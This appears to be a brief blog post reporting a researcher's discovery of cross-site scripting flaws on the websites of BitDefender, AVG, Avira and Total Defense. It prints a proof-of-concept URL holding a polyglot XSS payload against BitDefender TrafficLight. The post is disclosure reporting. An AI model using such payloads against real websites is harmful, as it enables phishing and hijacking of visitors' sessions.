Search This Blog

XSS Vulnerability found in 4 Antivirus websites



A Security Researcher Ankit Sharma has discovered Cross Site scripting vulnerability in four Antivirus websites.

The official websites belong to BitDefender , AVG, Avira and Total Defense Antivirus are vulnerable to xss.



In BitDefender TrafficLight , the URL input is not filtering the XSS. The Url input allows hackers to run malicious xss code. It can results in phishing attacks.

POC:
http://trafficlight.bitdefender.com/info?url=%27;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//\%27;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//%22;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//\%22;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29%3C/SCRIPT%3E



Share it:

Vulnerability

Web Application Vulnerability

XSS Vulnerability